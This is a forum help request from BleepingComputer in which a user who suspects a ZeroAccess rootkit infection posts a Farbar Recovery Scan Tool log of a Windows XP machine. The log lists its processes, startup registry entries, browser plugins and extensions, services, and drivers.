Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Possible ZeroAccess rootkit infection - computer very slow - IP changed


  • This topic is locked This topic is locked
20 replies to this topic

#1 danielzink

danielzink

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 19 June 2015 - 04:48 PM

Possible ZeroAccess rootkit infection - computer very slow - IP changed.

 

Thanks for any and all help

 

FRST Logs:

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-06-2015
Ran by Daniel (administrator) on DAN on 19-06-2015 17:39:54
Running from E:\AV\frst
Loaded Profiles: Daniel (Available Profiles: Daniel)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8 (Default browser path: "H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Application\torch.exe" -- "%1")
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ATI Technologies Inc.) H:\WINDOWS\system32\ati2evxx.exe
(ATI Technologies Inc.) H:\WINDOWS\system32\ati2evxx.exe
(brother Industries Ltd) H:\WINDOWS\system32\brsvc01a.exe
(brother Industries Ltd) H:\WINDOWS\system32\brss01a.exe
(SUPERAntiSpyware.com) H:\Program Files\SUPERAntiSpyware\SASCORE.EXE
(Apple Inc.) H:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) H:\Program Files\Bonjour\mDNSResponder.exe
(ESET) H:\Program Files\ESET\ESET Smart Security\ekrn.exe
(Oracle Corporation) H:\Program Files\Java\jre7\bin\jqs.exe
(Hewlett-Packard Company) H:\Program Files\Common Files\LightScribe\LSSrvc.exe
(Microsoft Corporation) H:\Program Files\IIS\Microsoft Web Deploy\MsDepSvc.exe
() H:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
() H:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
() H:\Program Files\CyberLink\Shared files\RichVideo.exe
(TeamViewer GmbH) H:\Program Files\TeamViewer\TeamViewer_Service.exe
(TorchMedia Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe
(Western Digital Technologies, Inc.) H:\Program Files\Western Digital\WD Drive Manager\WDDriveService.exe
(Microsoft Corporation) H:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Western Digital Technologies, Inc.) H:\Program Files\Western Digital\WD SmartWare\WDBackupEngine.exe
(Microsoft Corporation) H:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) H:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(TeamViewer GmbH) H:\Program Files\TeamViewer\TeamViewer.exe
(TeamViewer GmbH) H:\Program Files\TeamViewer\tv_w32.exe
(ScanSoft, Inc.) H:\Program Files\ScanSoft\PaperPort\pptd40nt.exe
(ESET) H:\Program Files\ESET\ESET Smart Security\egui.exe
(Adobe Systems Inc.) H:\Program Files\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
(CyberLink) H:\Program Files\CyberLink\Power2Go\CLMLSvc.exe
(CyberLink Corp.) H:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe
(cyberlink) H:\Program Files\CyberLink\Shared files\brs.exe
() H:\Program Files\DivX\DivX Update\DivXUpdate.exe
(Oracle Corporation) H:\Program Files\Common Files\Java\Java Update\jusched.exe
(Western Digital Technologies, Inc.) H:\Program Files\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe
(Western Digital Technologies, Inc.) H:\Program Files\Western Digital\WD Quick View\WDDMStatus.exe
(Apple Inc.) H:\Program Files\iTunes\iTunesHelper.exe
(Apple Inc.) H:\Program Files\iPod\bin\iPodService.exe
(Advanced Micro Devices Inc.) H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(BitLeader) H:\Program Files\lg_fwupdate\fwupdate.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Google Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) H:\WINDOWS\system32\msiexec.exe
(Microsoft Corporation) H:\WINDOWS\system32\cmd.exe
(Microsoft Corporation) H:\WINDOWS\system32\msiexec.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [GrooveMonitor] => H:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [googletalk] => H:\Program Files\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKLM\...\Run: [SSBkgdUpdate] => H:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe [155648 2003-10-14] (Scansoft, Inc.)
HKLM\...\Run: [PaperPort PTD] => H:\Program Files\ScanSoft\PaperPort\pptd40nt.exe [57393 2004-04-14] (ScanSoft, Inc.)
HKLM\...\Run: [IndexSearch] => H:\Program Files\ScanSoft\PaperPort\IndexSearch.exe [40960 2004-04-14] (ScanSoft, Inc.)
HKLM\...\Run: [egui] => H:\Program Files\ESET\ESET Smart Security\egui.exe [2140880 2010-02-22] (ESET)
HKLM\...\Run: [Adobe ARM] => H:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-03] ()
HKLM\...\Run: [RTHDCPL] => H:\WINDOWS\RTHDCPL.EXE [16050176 2006-08-14] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Adobe Acrobat Speed Launcher] => H:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe [40376 2012-03-27] (Adobe Systems Incorporated)
HKLM\...\Run: [Acrobat Assistant 8.0] => H:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe [640440 2012-03-26] (Adobe Systems Inc.)
HKLM\...\Run: [UpdateLBPShortCut] => H:\Program Files\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe [222504 2009-05-19] (CyberLink Corp.)
HKLM\...\Run: [MDS_Menu] => H:\Program Files\CyberLink\MediaShow4\MUITransfer\MUIStartMenu.exe [218408 2009-02-25] (CyberLink Corp.)
HKLM\...\Run: [CLMLServer] => H:\Program Files\CyberLink\Power2Go\CLMLSvc.exe [103720 2009-12-15] (CyberLink)
HKLM\...\Run: [UpdateP2GoShortCut] => H:\Program Files\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe [222504 2009-05-19] (CyberLink Corp.)
HKLM\...\Run: [RemoteControl9] => H:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2009-07-06] (CyberLink Corp.)
HKLM\...\Run: [BDRegion] => H:\Program Files\Cyberlink\Shared files\brs.exe [75048 2010-05-14] (cyberlink)
HKLM\...\Run: [UpdatePPShortCut] => H:\Program Files\CyberLink\PowerProducer\MUITransfer\MUIStartMenu.exe [218408 2008-12-03] (CyberLink Corp.)
HKLM\...\Run: [LGODDFU] => H:\Program Files\lg_fwupdate\lgfw.exe [27760 2012-08-15] (Bitleader)
HKLM\...\Run: [UpdatePSTShortCut] => H:\Program Files\CyberLink\Blu-ray Disc Suite\MUITransfer\MUIStartMenu.exe [222504 2010-06-02] (CyberLink Corp.)
HKLM\...\Run: [APSDaemon] => H:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM\...\Run: [DivXMediaServer] => H:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe [448520 2015-05-05] (DivX, LLC)
HKLM\...\Run: [DivXUpdate] => H:\Program Files\DivX\DivX Update\DivXUpdate.exe [1861968 2014-01-10] ()
HKLM\...\Run: [ControlCenter2.0] => H:\Program Files\Brother\ControlCenter2\brctrcen.exe [851968 2004-07-20] (Brother Industries, Ltd.)
HKLM\...\Run: [SunJavaUpdateSched] => H:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM\...\Run: [QuickTime Task] => H:\Program Files\QuickTime\qttask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [SetDefPrt] => H:\Program Files\Brother\Brmfl04a\BrStDvPt.exe [49152 2004-05-10] (Brother Industories, Ltd.)
HKLM\...\Run: [DriveUtilitiesHelper] => H:\Program Files\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe [1852264 2014-05-23] (Western Digital Technologies, Inc.)
HKLM\...\Run: [WD Quick View] => H:\Program Files\Western Digital\WD Quick View\WDDMStatus.exe [5564784 2015-02-12] (Western Digital Technologies, Inc.)
HKLM\...\Run: [iTunesHelper] => H:\Program Files\iTunes\iTunesHelper.exe [157480 2015-04-07] (Apple Inc.)
HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k
HKLM\...\Run: [StartCCC] => H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2013-04-11] (Advanced Micro Devices, Inc.)
Winlogon\Notify\AtiExtEvent: H:\WINDOWS\system32\Ati2evxx.dll [2013-04-11] (ATI Technologies Inc.)
Winlogon\Notify\WgaLogon: H:\WINDOWS\system32\WgaLogon.dll [2012-01-05] ()
HKU\S-1-5-21-1645522239-117609710-725345543-1003\...\Run: [Google Update] => H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [107912 2014-10-18] (Google Inc.)
HKU\S-1-5-21-1645522239-117609710-725345543-1003\...\Run: [SUPERAntiSpyware] => H:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [6714136 2015-06-06] (SUPERAntiSpyware)
HKU\S-1-5-21-1645522239-117609710-725345543-1003\...\Run: [GoogleChromeAutoLaunch_857B56F6900A6878C72A3C0E6AFBF7B4] => H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe [813896 2015-06-05] (Google Inc.)
SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, credssp.dll
Startup: H:\Documents and Settings\All Users\Start Menu\Programs\Startup\Status Monitor.lnk [2014-03-25]
ShortcutTarget: Status Monitor.lnk -> H:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe (Brother Industries, Ltd.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1645522239-117609710-725345543-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.cnn.com/
HKU\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-03-26] (Adobe Systems Incorporated)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> H:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> H:\Program Files\Java\jre7\bin\ssv.dll [2014-07-25] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> H:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-03-26] (Adobe Systems Incorporated)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> H:\Program Files\Java\jre7\bin\jp2ssv.dll [2014-07-25] (Oracle Corporation)
BHO: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-03-26] (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-03-26] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1645522239-117609710-725345543-1003 -> Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - H:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-03-26] (Adobe Systems Incorporated)
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/_layouts/ClientBin/ieawsdc32.cab
DPF: {0D6709DD-4ED8-40CA-B459-2757AEEF7BEE} http://download.gigabyte.com.tw/object/Dldrv.ocx
DPF: {4B54A9DE-EF1C-4EBE-A328-7C28EA3B433A} http://quickscan.bitdefender.com/qsax/qsax.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} https://secure.logmein.com//activex/ractrl.cab?lmi=1007
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - H:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
ShellExecuteHooks: SABShellExecuteHook Class - {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - H:\Program Files\SUPERAntiSpyware\SASSEH.DLL [115440 2013-05-07] (SuperAdBlocker.com)
Winsock: Catalog5 01 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 04 H:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Winsock: Catalog9 04 mswsock.dll File not found
Winsock: Catalog9 05 mswsock.dll File not found
 
FireFox:
========
FF ProfilePath: H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default
FF Homepage: hxxp://www.cnn.com/
FF NetworkProxy: "no_proxies_on", "*.local"
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> H:\WINDOWS\system32\Macromed\Flash\NPSWF32_12_0_0_77.dll [2014-03-11] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> H:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> H:\Program Files\DivX\DivX OVS Helper\npovshelper.dll [2014-05-22] (DivX, LLC.)
FF Plugin: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> H:\Program Files\DivX\DivX Web Player\npdivx32.dll [2015-05-14] (DivX, LLC)
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> H:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> H:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> H:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> H:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: Adobe Acrobat -> H:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll [2012-03-26] (Adobe Systems Inc.)
FF Plugin: TorchVLC -> H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Plugins\Video\VLC\npvlc.dll [2013-07-30] (VideoLAN)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @citrixonline.com/appdetectorplugin -> H:\Documents and Settings\Daniel\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll [2013-10-10] (Citrix Online)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @talk.google.com/GoogleTalkPlugin -> H:\Documents and Settings\Daniel\Application Data\Mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @talk.google.com/O1DPlugin -> H:\Documents and Settings\Daniel\Application Data\Mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @tools.google.com/Google Update;version=3 -> H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-22] (Google Inc.)
FF Plugin HKU\S-1-5-21-1645522239-117609710-725345543-1003: @tools.google.com/Google Update;version=9 -> H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-22] (Google Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-10-28] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: H:\Documents and Settings\Daniel\Application Data\mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin ProgramFiles/Appdata: H:\Documents and Settings\Daniel\Application Data\mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Extension: Flagfox - H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default\Extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b} [2012-12-17]
FF Extension: Microsoft .NET Framework Assistant - H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-08-24]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-08-13]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-10-06]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2012-10-26]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - h:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - h:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-08-19]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - H:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - H:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird [2010-08-20]
FF ExtraCheck: H:\Program Files\mozilla firefox\defaults\pref\itms.js [2015-04-03]
 
Chrome: 
=======
CHR Profile: H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-23]
CHR Extension: (No Name) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\cbdjiinahkdjdcdlgfimlcolkjpbooja [2013-03-04]
CHR Extension: (Google Search) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-23]
CHR Extension: (Tidy Sidebar) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dgmacifhhpefamjmolpipkijcofcmbgp [2015-04-07]
CHR Extension: (Hangouts) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\knipolnnllmklapflnccelgolnpehhpl [2015-02-27]
CHR Extension: (Chrome Hotword Shared Module) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-12]
CHR Extension: (Video Downloader [FVD]) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lfmhcpmkbdkbgbmkjoiopeeegenkdikp [2013-05-27]
CHR Extension: (Google Wallet) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-23]
StartMenuInternet: Google Chrome - H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; H:\Program Files\SUPERAntiSpyware\SASCORE.EXE [142648 2014-08-19] (SUPERAntiSpyware.com)
S2 brmfrmps; H:\WINDOWS\system32\Brmfrmps.exe [65536 2003-05-05] (Brother Industries, Ltd.) [File not signed]
R2 Brother XP spl Service; H:\WINDOWS\system32\brsvc01a.exe [57344 2002-04-12] (brother Industries Ltd)
S2 CLKMSVC10_EAE0C07E; H:\Program Files\CyberLink\PowerDVD9\NavFilter\kmsvc.exe [246256 2010-05-14] (CyberLink)
S3 EhttpSrv; H:\Program Files\ESET\ESET Smart Security\EHttpSrv.exe [33560 2010-02-22] (ESET)
R2 ekrn; H:\Program Files\ESET\ESET Smart Security\ekrn.exe [810120 2010-02-22] (ESET)
S3 FLEXnet Licensing Service; H:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2010-11-18] (Macrovision Europe Ltd.) [File not signed]
R2 JavaQuickStarterService; H:\Program Files\Java\jre7\bin\jqs.exe [182696 2014-07-25] (Oracle Corporation)
R2 LightScribeService; H:\Program Files\Common Files\LightScribe\LSSrvc.exe [73728 2010-11-22] (Hewlett-Packard Company) [File not signed]
S2 MBAMService; H:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-04-14] (Malwarebytes Corporation)
R2 MsDepSvc; H:\Program Files\IIS\Microsoft Web Deploy\MsDepSvc.exe [88712 2014-09-26] (Microsoft Corporation)
R2 MySQL; H:\Program Files\MySQL\MySQL Server 5.1\my.ini [8951 2015-01-01] () [File not signed]
R2 Net Driver HPZ12; H:\WINDOWS\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed]
R2 PassThru Service; H:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [80896 2011-03-31] () [File not signed]
R2 Pml Driver HPZ12; H:\WINDOWS\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed]
R2 RichVideo; H:\Program Files\CyberLink\Shared files\RichVideo.exe [244904 2009-07-02] () [File not signed]
R2 TeamViewer; H:\Program Files\TeamViewer\TeamViewer_Service.exe [5495056 2015-06-01] (TeamViewer GmbH)
R2 TorchCrashHandler; H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe [1217032 2015-05-12] (TorchMedia Inc.) <==== ATTENTION
R2 WDBackup; H:\Program Files\Western Digital\WD SmartWare\WDBackupEngine.exe [1042808 2015-02-12] (Western Digital Technologies, Inc.)
R2 WDDriveService; H:\Program Files\Western Digital\WD Drive Manager\WDDriveService.exe [302968 2015-02-12] (Western Digital Technologies, Inc.)
S4 BITS; C:\WINDOWS\system32\qmgr.dll [X]
S4 wuauserv; C:\WINDOWS\system32\wuauserv.dll [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 Ambfilt; H:\WINDOWS\System32\drivers\Ambfilt.sys [1691480 2009-11-17] (Creative)
R1 AmdPPM; H:\WINDOWS\System32\DRIVERS\AmdPPM.sys [33792 2007-04-16] (Advanced Micro Devices)
R3 AtiHDAudioService; H:\WINDOWS\System32\drivers\AtihdXP3.sys [103040 2012-05-14] (Advanced Micro Devices)
S3 BrScnUsb; H:\WINDOWS\System32\Drivers\BrScnUsb.sys [15263 2003-12-19] (Brother Industries Ltd.)
S3 CCDECODE; H:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-13] (Microsoft Corporation)
R2 eamon; H:\WINDOWS\System32\DRIVERS\eamon.sys [139192 2010-02-22] (ESET)
R1 ehdrv; H:\WINDOWS\System32\DRIVERS\ehdrv.sys [114984 2010-02-22] (ESET)
R2 epfw; H:\WINDOWS\System32\DRIVERS\epfw.sys [134488 2010-02-22] (ESET)
R3 Epfwndis; H:\WINDOWS\System32\DRIVERS\Epfwndis.sys [32584 2010-02-22] (ESET)
R1 epfwtdi; H:\WINDOWS\System32\DRIVERS\epfwtdi.sys [55232 2010-02-22] (ESET)
S3 gdrv; H:\WINDOWS\gdrv.sys [17488 2012-03-26] (Windows ® 2000 DDK provider)
S3 grmnusb; H:\WINDOWS\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.)
R3 IntcAzAudAddService; H:\WINDOWS\System32\drivers\RtkHDAud.sys [4368896 2006-08-15] (Realtek Semiconductor Corp.) [File not signed]
R1 mbamchameleon; H:\WINDOWS\system32\drivers\mbamchameleon.sys [120024 2015-06-18] (Malwarebytes Corporation)
R3 MBAMProtector; H:\WINDOWS\system32\drivers\mbam.sys [23256 2015-04-14] (Malwarebytes Corporation)
S3 Monfilt; H:\WINDOWS\System32\drivers\Monfilt.sys [1395800 2009-11-17] (Creative Technology Ltd.)
S3 NdisIP; H:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-13] (Microsoft Corporation)
R3 NVENETFD; H:\WINDOWS\System32\DRIVERS\NVENETFD.sys [70912 2010-03-04] (NVIDIA Corporation)
R0 nvgts; H:\WINDOWS\System32\DRIVERS\nvgts.sys [168040 2010-04-08] (NVIDIA Corporation)
R3 nvnetbus; H:\WINDOWS\System32\DRIVERS\nvnetbus.sys [13824 2010-03-04] (NVIDIA Corporation)
R3 pcouffin; H:\WINDOWS\System32\Drivers\pcouffin.sys [47360 2011-02-02] (VSO Software) [File not signed]
S3 RTLTEAMING; H:\WINDOWS\System32\DRIVERS\RTLTEAMING.SYS [29184 2009-05-15] (Realtek Semiconductor Corporation) [File not signed]
S3 RTLVLAN; H:\WINDOWS\System32\DRIVERS\RTLVLAN.SYS [17536 2009-02-16] (Realtek Semiconductor Corporation                           ) [File not signed]
R2 RtNdPt5x; H:\WINDOWS\System32\DRIVERS\RtNdPt5x.sys [22016 2008-07-09] (Realtek Semiconductor Corporation                           )
R1 SASDIFSV; H:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS [12880 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; H:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS [67664 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
